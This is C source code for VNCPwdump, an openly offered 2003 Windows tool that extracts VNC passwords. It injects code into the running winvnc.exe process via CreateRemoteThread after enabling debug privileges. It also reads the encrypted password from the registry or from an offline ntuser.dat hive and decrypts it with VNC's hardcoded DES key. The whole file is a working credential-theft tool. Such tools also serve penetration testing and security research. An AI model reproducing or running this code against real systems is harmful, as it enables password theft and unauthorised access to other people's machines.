/*
   VNC Password Dumper
   Copyright (c) 2003 Patrik Karlsson

   http://www.cqure.net

   DLL injection code is based on the pwdump2 code by Todd A. Sabin

   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation; either version 2 of the License, or
   (at your option) any later version.
   
   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.
   
   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/


#include <stdio.h>
#include <windows.h>
#include <winnt.h>
#include <winreg.h>

#include "vncpwdump.h"
#include "getopt.h"
#include "d3des.h"

char *pBanner = "\nVNCPwdump v.1.0.0 by patrik@cqure.net\n"
				"-------------------------------------\n";

BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege);
extern int find_pid (DWORD *ppid, char *process);
void DecryptPw( char * );

static DWORD RemoteFunction (REMOTE_INFO *pInfo) {

    HINSTANCE hDll;
    pVNCDump_t pVNCDump;
    int rc = -1;

    hDll = pInfo->pLoadLibrary (pInfo->szDllName);
    if (hDll != NULL)
    {
        pVNCDump = (pVNCDump_t) pInfo->pGetProcAddress (hDll, pInfo->szProcName);
        if (pVNCDump != 0) {
            rc = pVNCDump (pInfo->szPipeName );
        }
        pInfo->pFreeLibrary (hDll);
    }
    return rc;
}

static void DummyFunc (void)
{
    return;
}

/*
 * DLL injection code based on code by Todd Sabin's pwdump2
 *
 */
HANDLE InjectDll (HANDLE hProc, LPVOID pRemoteAlloc ) {

    DWORD dwFuncSize;
    DWORD dwBytesToAlloc;
    REMOTE_INFO remInfo;
    HINSTANCE hKernel32;
    CHAR szDllName[MAX_PATH];
    DWORD dwBytesWritten;
    HANDLE hRemoteThread = 0;
    DWORD dwIgnored;

	HANDLE hPipe = NULL;

	pRemoteAlloc = NULL;

    hKernel32 = LoadLibrary ("Kernel32");
    remInfo.pLoadLibrary = (pLoadLib_t) GetProcAddress (hKernel32, "LoadLibraryA");
    remInfo.pGetProcAddress = (pGetProcAddr_t) GetProcAddress (hKernel32, "GetProcAddress");
    remInfo.pFreeLibrary = (pFreeLib_t) GetProcAddress (hKernel32, "FreeLibrary");

    GetModuleFileName (NULL, szDllName, sizeof (szDllName));
    strcpy (strrchr (szDllName, '\\') + 1, "vncdumpdll.dll");
    strncpy (remInfo.szDllName, szDllName, sizeof (remInfo.szDllName));
    strncpy (remInfo.szProcName, "VNCDump", sizeof (remInfo.szProcName));
	_snprintf (remInfo.szPipeName, sizeof (remInfo.szPipeName),
               "\\\\.\\pipe\\vncdump-%d", GetCurrentProcessId ());

    dwFuncSize = (DWORD)DummyFunc - (DWORD)RemoteFunction;
    dwBytesToAlloc = dwFuncSize + sizeof (REMOTE_INFO) + 4;
    pRemoteAlloc = VirtualAllocEx (hProc, NULL, dwBytesToAlloc,
                                   MEM_COMMIT, PAGE_READWRITE);
    
	if (pRemoteAlloc == NULL) {
        fprintf (stderr, "VirtualAllocEx failed: %d\n",
                 GetLastError ());
        return NULL;
    }
    
    if (!WriteProcessMemory (hProc, pRemoteAlloc, &remInfo, sizeof (remInfo),
                             &dwBytesWritten))
    {
        fprintf (stderr, "WriteProcessMemory failed: %d\n",
                 GetLastError ());
        return NULL;
    }

    if (!WriteProcessMemory (hProc,
                             (PBYTE)pRemoteAlloc + sizeof (REMOTE_INFO) + 4,
                             (LPVOID)(DWORD)RemoteFunction, dwFuncSize,
                             &dwBytesWritten))
    {
        fprintf (stderr, "WriteProcessMemory failed: %d\n",
                 GetLastError ());
        return NULL;
    }

    hRemoteThread = CreateRemoteThread (hProc, NULL, 0,
                                        (LPTHREAD_START_ROUTINE)((PBYTE) pRemoteAlloc + sizeof (REMOTE_INFO) + 4),
                                        pRemoteAlloc, 0, &dwIgnored);
    if (!hRemoteThread) {
        fprintf (stderr, "CreateRemoteThread failed: %d\n", GetLastError ());
        return NULL;
    }

	return hRemoteThread;

}

/*
 * Translate the error code to a message
 *
 */
void errormsg( long lErr ) {

	LPVOID lpMsgBuf;
	
	if (!FormatMessage( 
		FORMAT_MESSAGE_ALLOCATE_BUFFER | 
		FORMAT_MESSAGE_FROM_SYSTEM | 
		FORMAT_MESSAGE_IGNORE_INSERTS,
		NULL,
		lErr,
		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
		(LPTSTR) &lpMsgBuf,
		0,
		NULL ))
	{		
		return;
	}

	fprintf(stderr, "%s\n", (LPCTSTR)lpMsgBuf);


}

/*
 * Sets appropriate priviliges for current process
 *
 */
BOOL SetPrivilege( HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege ) {
    
	TOKEN_PRIVILEGES tp;
    LUID luid;
    TOKEN_PRIVILEGES tpPrevious;
    DWORD cbPrevious=sizeof(TOKEN_PRIVILEGES);

    if(!LookupPrivilegeValue( NULL, Privilege, &luid )) 
		return FALSE;

    tp.PrivilegeCount           = 1;
    tp.Privileges[0].Luid       = luid;
    tp.Privileges[0].Attributes = 0;

    AdjustTokenPrivileges( hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), 
							&tpPrevious, &cbPrevious );

    if (GetLastError() != ERROR_SUCCESS) 
		return FALSE;

    tpPrevious.PrivilegeCount       = 1;
    tpPrevious.Privileges[0].Luid   = luid;

    if(bEnablePrivilege) {
        tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED);
    }
    else {
        tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED &
            tpPrevious.Privileges[0].Attributes);
    }

    AdjustTokenPrivileges( hToken, FALSE, &tpPrevious, cbPrevious, NULL, NULL );

    if (GetLastError() != ERROR_SUCCESS)
		return FALSE;

    return TRUE;
}

/*
 * Open a datfile, retrieve and decrypt pw
 *
 */
void DumpFromDat(char sFileName[MAX_PATH]) {

	LONG lRet;
	LONG lPwLen = 0;
	HKEY hVncKey;
	HANDLE hToken;
	char *pKey = "vnc_haxxor";
	char *pVNCKey = "vnc_haxxor\\Software\\ORL\\Winvnc3\\";
	char *pVNCSubKey = "Password";
	CHAR sEncPw[200];
	DWORD dwValType;

	if(!OpenProcessToken(
			GetCurrentProcess(),
			TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
            &hToken)) {
	
		fprintf(stderr, "ERROR: Failed to OpenProcessToken\n");
		exit(1);
	}

    if(!SetPrivilege(hToken, SE_RESTORE_NAME, TRUE)) {
        fprintf(stderr, "ERROR: Failed to SetPrivilege");
        CloseHandle(hToken);
        exit(1);
    }
	
	lRet = RegLoadKey( HKEY_USERS, pKey, sFileName);
	
	if ( lRet != ERROR_SUCCESS ) {
		errormsg( lRet );
		exit(1);
	}
	
	if ( RegOpenKey( HKEY_USERS, pVNCKey, &hVncKey ) != ERROR_SUCCESS ) {
		fprintf(stderr, "ERROR: Failed to open key\n");
		RegUnLoadKey( HKEY_USERS, pKey );
		return;
	}

	lPwLen = sizeof( sEncPw );
	if ( RegQueryValueEx( hVncKey, pVNCSubKey, NULL, &dwValType, 
						(CHAR *)&sEncPw, &lPwLen ) != ERROR_SUCCESS ) {
		fprintf(stderr, "ERROR: Failed to query value\n");
		RegUnLoadKey( HKEY_USERS, pKey );
		return;
	}
	
	DecryptPw( sEncPw );

	RegCloseKey( hVncKey );
	lRet = RegUnLoadKey( HKEY_USERS, pKey );

	if ( lRet != ERROR_SUCCESS ) {
		errormsg( lRet );
		exit(1);
	}

	
	CloseHandle( hToken );

}

/*
 * Create incoming named pipe
 *
 */
HANDLE CreateInNamedPipe() {

    CHAR szPipeName[MAX_PATH];
	HANDLE hPipe;

    _snprintf (szPipeName, sizeof (szPipeName),
               "\\\\.\\pipe\\vncdump-%d", GetCurrentProcessId ());

	hPipe = CreateNamedPipe (szPipeName,
								PIPE_ACCESS_INBOUND | FILE_FLAG_WRITE_THROUGH,
								PIPE_TYPE_BYTE | PIPE_WAIT,
								2, DUMP_PIPE_SIZE, DUMP_PIPE_SIZE,
								10000, NULL);

    if (!hPipe) {
        fprintf (stderr, "Failed to create the pipe: %d\n",
                 GetLastError ());
        return 0;
    }


	return hPipe;

}

/*
 * Listen on incoming namedpipe
 *
 */
DWORD WINAPI ListenForPassword(HANDLE *hIn) {

	DWORD dwRead;
	char buf[2048];
	
	if ( !ConnectNamedPipe( *hIn, 0 ) ) {
		fprintf(stderr, "ERROR: Failed to connect to pipe %X\n", *hIn );
		return -1;
	}

	ReadFile( *hIn, buf, sizeof(buf), &dwRead, 0 );
	fprintf( stdout, "%s", pBanner );
	fprintf( stdout, "Password: %s\n", buf );

	return 0;

}

/*
 * Inject inside running vnc process and dump its registry keys
 *
 */
void InjectVNC() {

	DWORD dwPid = 0, dwErr = 0, dwThread = 0;
	CHAR *proc = "winvnc.exe";
	HANDLE hProc;
	HANDLE hToken = 0;
	HANDLE hInPipe = 0;
	HANDLE hRemoteThread;
	HANDLE hInThread;
    LPVOID pRemoteAlloc = NULL;

    if (!OpenProcessToken (GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
		fprintf(stderr, "ERROR: Failed to acquire token\n");
		exit(1);
	}

	SetPrivilege( hToken, SE_DEBUG_NAME, TRUE );

	find_pid (&dwPid, proc );
	
	if ( dwPid == 0 ) {
		fprintf(stderr, "ERROR: Failed to find process %s\n", proc);
		exit(1);
	}

    hProc = OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwPid);
    
	if (hProc == 0) {
        dwErr = GetLastError ();
        fprintf (stderr, "Failed to open process: %d.  Exiting.\n", dwErr);
        exit (1);
    }


	hInPipe = CreateInNamedPipe();

	if ( !hInPipe )
		exit(1);

	hInThread = CreateThread( NULL, 0, ListenForPassword, &hInPipe, 0, &dwThread );
    hRemoteThread  = InjectDll (hProc, pRemoteAlloc);

	if ( !hRemoteThread ) {
		fprintf( stderr, "ERROR: Failed to InjectDll\n");
		exit(1);
	}

	WaitForSingleObject( hInThread, INFINITE );


}

/*
 * unsigned char *char2hex(char *chr, int nLen)
 *
 * converts a 'string' to a hexarray
 *
 */
unsigned char *char2hex(char *chr, int nLen) {

	int i;
	unsigned char hex[2];
	unsigned char *retHex;
	unsigned int hex3;

	retHex = (unsigned char *) malloc( nLen ); /* should be nLen / 2 */
	memset( retHex, 0, nLen );

	for ( i=0; i<nLen; i ++ ) {
		memset( hex, 0, sizeof( hex ) );
		memcpy( hex, chr + i, 2 );
		sscanf( hex, "%2x", &hex3);
		retHex[i/2]=hex3;
		i++;
	}

	return retHex;

}

/*
 * Decrypts and prints the VNC password
 *
 */
void DecryptPw( char *pPW ) {

	/* vnc fixed DES key */
	unsigned char fixedkey[8] = {23,82,107,6,35,78,88,7};
	char clrtxt[10];
	
	deskey(fixedkey, DE1);
    des(pPW, clrtxt);
	clrtxt[8] = 0;

	fprintf(stdout, "%s", pBanner );
	fprintf(stdout, "Password: %s\n", clrtxt);

}

void DecryptRegPw( char *pPW ) {

	unsigned char *pClear;
	pClear = char2hex( pPW, 16 );
	DecryptPw( pClear );
	free( pClear );

}

/*
 * Dumps and decrypts the current users VNC password
 *
 */
void DecryptCurrentUserPw() {
	
	HKEY hVncKey;
	LONG lPwLen = 0;
	char *pVNCKey = "Software\\ORL\\Winvnc3\\";
	char *pVNCSubKey = "Password";
	CHAR sEncPw[200];
	DWORD dwValType;
	
	if ( RegOpenKey( HKEY_CURRENT_USER, pVNCKey, &hVncKey ) != ERROR_SUCCESS ) {
		fprintf(stderr, "ERROR: Key does not exist ...\n");
		return;
	}

	lPwLen = sizeof( sEncPw );
	if ( RegQueryValueEx( hVncKey, pVNCSubKey, NULL, &dwValType, 
						(CHAR *)&sEncPw, &lPwLen ) != ERROR_SUCCESS ) {
		fprintf(stderr, "ERROR: RegQueryValueEx()\n");
		return;
	}

	DecryptPw( sEncPw );

}

/*
 * Usage information
 *
 */
void usage(char *pProg) {

	fprintf(stderr, "\n");
	fprintf(stderr, "VNCPwDump V0.0.1 by patrik@cqure.net\n");
	fprintf(stderr, "------------------------------------\n");
	fprintf(stderr, "%s -r | -d | -k\n", pProg );
	fprintf(stderr, "\n");
	fprintf(stderr, "   -c (decrypt the current users password)\n");
	fprintf(stderr, "   -r <ntuser.dat> (Reads value from ntuser.dat and decrypts it)\n");
	fprintf(stderr, "   -d (Injects into the VNC process and dumps the pw)\n");
	fprintf(stderr, "   -k <key> (Decrypts the key from the command line)\n");
	
}

/*
 * ..... no comment .....
 *
 */
int main( int argc, char **argv ) {

	int c;

	while (1) {

		c = getopt (argc, argv, "r:dk:c");

	    if ( c == -1 )
			break;

		switch (c) {
      
			case 'c':
				DecryptCurrentUserPw();
				break;

		    case 'r':
				DumpFromDat( optarg );	
				break;
			case 'd':
				InjectVNC();
				break;
			case 'k':
				DecryptRegPw( optarg );
				break;
			default:
				usage( argv[0] );
				exit(1);

		}

	}

	if ( argc < 2 ) {
		usage( argv[0] );
		exit(1);
	}

}